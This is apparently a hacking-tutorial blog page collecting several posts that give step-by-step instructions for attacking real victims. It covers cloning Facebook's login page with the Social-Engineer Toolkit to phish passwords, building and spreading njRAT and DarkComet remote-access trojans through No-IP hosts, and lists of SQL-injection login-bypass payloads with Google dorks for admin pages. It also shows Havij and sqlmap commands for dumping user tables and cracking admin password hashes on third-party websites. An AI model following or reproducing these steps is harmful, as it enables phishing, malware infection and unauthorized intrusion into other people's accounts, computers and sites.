How To hack facebook account using backtrack or kali linux??

How To hack facebook account using backtrack or kali linux??
Post By Asad Ullah
Follow these steps:

• Kali Linux > Exploitation Tools > Social Engineering Toolkit > se-toolkit  and click Enter to start.

• To choose Social -Engineering Attacks  type “1” and click Enter.

• For choosing Website Attack Vectors type “2” and click Enter.

• To choose  Web Jacking Attack Method  type “5”  and click Enter.

• With “2” choose Site Cloner.

• And now we need  to IP gateway address, open new  console(terminal) and type“ifconfig”
• This will show our IP address.  Copy IP address.

• Paste the copied IP to 1. Console(terminal).

• Now we will write facebook url. Type “facebook.com”  and press Enter.

• Our job is DONE.  So now hacking accounts depends  on your social-engineering. For example, you can send your IP address to your victim and say ”can you visit my page?” etc. 

• Let’s try;
• We will write the IP address which we assigned the url.

Mail : norsinli@cw.org

şifre: Cyber-warrior

• As you see, it works successfully.

The job is finished. J

Hope you like it. If so, please do not forget to comment it below and share it with your friends
Enjoy....:)
Ask Any Qusation Click HERE
...................................................................................................................................................

View Full Gallery

Hack Facebook / Paypal Password using NjRAT | How To Setup NjRAT

Hack Facebook / Paypal Password using NjRAT | How To Setup NjRAT

♥ Post  By Asad Ullah ♥

Follow the instruction given bellow to setup NjRAT,

Step 1

Free Download NjRAT to hack Computer or email account password.

Step 2

Now, go to No-ip.com and register for an account. After email verification, login to your account and click on “Add a host” to get this page,

Step 3

Now, fill the information as below: -

Hostname : Choose anything you want. Here, I have used- wildhacker.
From the adjacent drop down box, select “no-ip.biz” (Don’t use any other or it may not work).
Leave all things same and hit on “Create host”.

Step 4

Now, free download No-ip client and install it on your computer. Run the No-ip client software and enter your No-ip login and password. After a successful log-in, No-ip shows pop-up box like this (if it doesn’t show, hit on “Select Hosts”):

Step 5

Hit on checkbox just besides your host created in Step 4 and hit on Save. That’s it. You have completed setting up free No-ip host.

Step 6

Now run njRAT.exe file,

Step 7

Now click on Builder option and fill the information as below:

Host : Host name which you have created in step 3.
Victim name : Enter anything you want.
Exe Name : Enter anything you want.
And finally select option Randomize Stub.

Now click on Build option to create server file.

Thats it.

Now all you need to do  is just spread that server file, then, when a victim runs the executable – the remote PC will automatically connect to your PC.

After that you can do anything you wish in your victim’s machine.

View Full Gallery

HOW TO HACK WEBSITE USING SQL INJECTION ATTACK

HOW TO HACK WEBSITE USING SQL INJECTION ATTACK

Hello guys I will show you how to hack website using SQL injection attack. SQL injection attack is a code injection technique or method, which is used to attack data driven applications. In this attack, malicious SQL statements are inserted in entry field for execution. SQL injection attack (SQLIA) is considered one of the top web application vulnerabilities. By using SQL Injection method it is very easy to hack vulnerable website. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database. Now I am going to show how it works, you just follows my steps….

 

Step 1 :- First you search the admin page of vulnerable web site. For searching vulnerable web page you take the help of google . Open your google page and use following script.

                 Use any one of the following…

“inurl:admin.asp”

“inurl:login/admin.asp”

 “inurl:admin/login.asp”

-“inurl:adminlogin.asp”

 “inurl:adminhome.asp”

 “inurl:admin_login.asp”

 “inurl:administratorlogin.asp”

“inurl:login/administrator.asp”

 “inurl:administrator_login.asp”

“inurl: admin.php”

   “inurl: login/admin.php”

 “inurl: admin/login.php”

 “inurl: adminlogin.php”

 “inurl: adminhome.php”

 “inurl: admin_login.php”

 “inurl: administratorlogin.php”

 “inurl: login/administrator.php”

 “inurl: administrator_login.php”

In above fig. you see there is many admin page open, now just open any one page.

 

Step 2 :- Now you can use the following code and inject into user id and password field.

             For user id used admin  as user id.

             And in password field use one one of the following code and some times these codes are also used for both user id as well as password.

test’or1–

‘or 1=1#

1’or’1’=’1

‘)or1=1—

‘or ” = ‘

‘or’1’=’1

‘ or ‘1’=’1

‘ or ‘x’=’x

‘ or 0=0 –

” or 0=0 –

or 0=0 –

‘ or 0=0 #

” or 0=0 #

or 0=0 #

‘ or ‘x’=’x

” or “x”=”x

‘) or (‘x’=’x

‘ or 1=1–

” or 1=1–

or 1=1–

‘ or a=a–

” or “a”=”a

‘) or (‘a’=’a

“) or (“a”=”a

hi” or “a”=”a

hi” or 1=1 –

hi’ or 1=1 –

‘or’1=1′

‘or’ ‘=’

 

After injection following code then click submit. Here you go I am successfully login into admin page now you can do any modify or change in this website.

 

 

View Full Gallery

DarkComet v5.3 Setup

DarkComet v5.3 Setup

"France is proud to present DarkComet, a Remote Administration Tool already chosen by hundreds of thousands of people worldwide. These users describe DarkComer-RAT [as] one of the very best around, it is totally free to use and allows you to control many remote machines at the same time using hundreds of functions (webcam streaming, desktop streaming, micro streaming, keylogger, MSN control, system control, etc, etc.)
DarkComet is also considered as the most stable RAT around and it is even regarded more stable than some professional ones (profesional is another word for not free). Why would you spend even one dollar on a RAT when you can have better one for free ?" (Quoted from DarkComet Website)

Downloading DarkComet:

Go to: Mediafire Link Download

Go to: Mega Download

Using No-Ip and Creating Account

Go Here: http://www.no-ip.com

Click Create Account:

Click Free DNS:

Fill in your information and activate your account:

Download No-Ip Client (Select Windows):

Login to your account on No-Ip.com

Make a Host with NO-IP.BIZ and make a random name in the textbox and leave everything else.

Login to No-IP Client using the Email Address and password you signed up before

Select 'Select Hosts':

Tick the hostname that you had made before:

Congratzzz! You have finished the first stage!


After That:

Open DarkComet v5.3:

Click on the Top Left corner where it says DarkComet-Rat and click on Listen to new port. Use the port 100 which you portforwarded earlier. Then Click Listen:

After adding the listened port, click on the Top Left corner again and click on Server Module :

Follow the image and don't check the Firewall thing if you are using a crypter afterwards:

Network Settings, Change the Ip/DNS to your domain name you made with No-ip, change port to 100:

Don't check Module startup if your crypter has startup as a option!! Skip everything else unless you need them:

Click on Build Module and leave the Building as is:

Lets test the Server, maker sure No-ip client is on!!

                   Hope you liked this TUT!

View Full Gallery

How To Hack Website Using Havij

How To Hack Website Using Havij

SQL Injection Is Most Widely Used Common Method In Web Hacking. Most Websites Are Being Hacked Using SQL Injection These Days. In This Post We Are Going To Learn About A Tool CalledHavij. Havij Is An Automated SQL Injection Tool. It Helps Pen-Testers To Find And Exploit Vulnerabilities On A Web Page. You Can Perform Back-End Database Finger Printing, Retrieve DBMS Login Names And Password In The Shape Of Hashes. You Can Also Dump Tables And Columns, Can Fetch Data From The Database, Can Execute SQL Statements Against The Server And Much More. As We Know, That There Are Many Tools Available On Internet, By Using Which Anyone Can Hack Vulnerable Websites. Because Of The Availability Of Hacking Tools. Hacking Websites Is Becomming Easy And The Number Of Hacking Websites Is Also Increasing. Everyone Can Use Havij For Hacking Websites And For Testing Vulnerabilities. Because Of GUI(Graphical User Interface) And Automated Configuration. In This Post I Am Going To Share Tutorial Of Havij. How To Use It And How Can A Person Hack SQLI Vulnerable Website By Using This Tool.
I Have Already Share A Tutorial On SQL Injection By Using SQL Map Tool. Visit Following Link To Read That Post.

• How To Hack Website Using SQLMap

How To Hack Website Using Havij?

Things We Need:

1. Havij Tool - (Search In Google And Download Cracked Version.)
2.  SQLI Vulnerable Website. - Use Google Dorks To Search Vulnerable Website.

Start Tutorial.

1. Open Havij.
2. Type Vulnerable Website Inside It And Hit Analyze Button.

3. Now Click On Tables Tab And Then Hit Get DBs Button.

4. Now You Have Got All Databases In Result. Tick Databases And Hit Get Tables Button.

5. You Have Got Tables From The Databases You Ticked In Previous Step. Now Tick Related Tables And Hit Get Columns Button.

6. You Have Got Columns From Ticked Table. Tick Related Columns And Press Get DataButton.

I Am Going To Choose Username, Password, UserGroup Columns. There Should Be Stored Data Related To Admin's Username, Password Etc.

7. Bingo! You Have Got Username And Password Of Admin.

How To Crack Hash?

As You Can See, We Have Received All Information Of Admin. Like Username, Password And UserGroup. But We Have Received Password In The Shape Of Hash. In Order To See The Real Password. We Have To Crack This Code. For Cracking This Code. We Will Make Use Of HavijTool Again. Follow Me To Crack This Hash.

1. You Can See A Button Of MD5 In Buttons List Of Havij. Hit That Button And Paste Your Hash Code Inside It And Press Start Button.

2. You Can See Password In Plain Text In Result Now. See Picture Below.

Find Admin Page

We Have Got Everything. Like Username, Password. But Where To Use Them And Get Admin Rights? You Need To Find The Admin Login Page Of Target Site. For Finding Admin Page Of Target Site. We Will Use Havij Again.

1. In Buttons List, Press Find Admin Button. Type Homepage Url Of Target Site. Press Start Button.

You Will Get Result Same Like Hash Cracking. You Will Be Able To See The Page. Which Admin Of Your Target Site Use To Login.

View Full Gallery

SQL Injection Using SqlMap

SQL Injection Using SqlMap

Sqlmap Is An Automated Pen Testing Tool. That Automates The Process Of Detecting And Exploiting SQL Injection Flaws And Taking Over Of Databases. It Comes With A Powerful Detection Engine, Many Niche Features For The Ultimate Pen Tester And A Broad Range Of Switchs Lasting From Database Fingerprinting. Over Data Fetching From The Database. This Tool Is Best For Beginners. Who Just Now Entered In Security Field. It Is Easy To Use Tool. This Tool Makes SQL Injection Easy As Compared To Manual SQL Injection.

SQLMap In BackTrack 5R3

1. Open Terminal And Type Following Command To Open SqlMap.

cd /pentest/database/sqlmap

Or

Go To Applications>BackTrack>Exploitation Tools>DataBase Exploitation Tools>MySQL Exploitation Tools>sqlmap

SQLMap In Windows

1. Download Sqlmap From Here.
2. Extract It.
In Windows OS, You Can Use Sqlmap In Command Prompt. Same Like BackTrack. 

SQL Injection In SQLMap - Website Hacking

I Am Going To Tell, That How Can An Hacker Make Use Of Sqlmap For Hacking A Vulnerable Website. By Using This Tool Hacker Can Get Username And Password Information Too. We Are Sharing These Method's With You Just For Knowledge. HWA Is Not Responsible For Any Bad Activity Which You Do With The Knowledge Gain From HWA. Continue Reading Below If Agree. You Can Understand This Method Easily.
For Doing Following Steps. You Will Need A SQL Injection Vulnerable Website. You Can Find Vulnerable Website's Using Dorks In Google. Follow Steps Below To Continue:

1. Open Sqlmap.
2. Type Following Command.

python sqlmap.py -u http://www.vulnerablewebsite.com --dbs

The Above Command Will Show You Database Information Of Vulnerable Website. See Following Picture.

Note: In Your Case, Databases Maybe Different From Above Picture.
3. Now Choose Any Of The Database From Result. For Example: I Am Choosing dkg. Now Use Following Command.

python sqlmap.py -u http://www.vulnerablewebsite.com -D dkg --tables

It Will Show You Tables, Which dkg Database Has. Like Following Picture. Watch Following Picture.

4. Now You Have Got Tables Of Database. Choose Any Of The Table From The Result For Getting Information From It. Hacker's Need Username And Password To Login The Victim Site. So, In This Case. You Should Choose uvp_Users Table. It May Contain Information About The Users Of Website. It Maybe Username, Password In This Table. So, I Am Going To Dump uvp_Users Table Now. By Dumping The Table You Will Be Able To See Information Saved In Table.
Use Following Command To Dump Information From Table.

python sqlmap.py -u http://www.vulnerablewebsite.com -D dkg -T uvp_Users --dump

Above Command Will Dump The Information From Choosed Table. If The Table Which You Choosed, Contains Password In It In Hash Format. Then Sqlmap Will Ask You For Dictionary Based Hash Cracking Attack. Allow It To Get Password In ABC Characters. See Following Picture.

5. Press Y And Press Enter. It Will Ask What Dictionary Do You Want To Use?. Choose Default Dictionary. Type 1 And Press Enter.

6. Now It Will Ask For Common Password Suffixies (slow!). Type y And Press Enter.

Now Password Cracking Procedure Is Started. It Will Some Minutes To Crack It. After The Cracking Process Finishes. You Will Be Able To See Password In Characters Form Along With Other Information. Which Is Saved In Table. Like In uvp_Users You Can See, Username, Password, UserGroup Etc.
After Finishing The Cracking Process. You Will Be Able To See Result Like Following Picture:

You Can See Username And Password In Above Picture. SQL Injection Is Done Using Sqlmap. Have Any Question? Ask In Comments.

View Full Gallery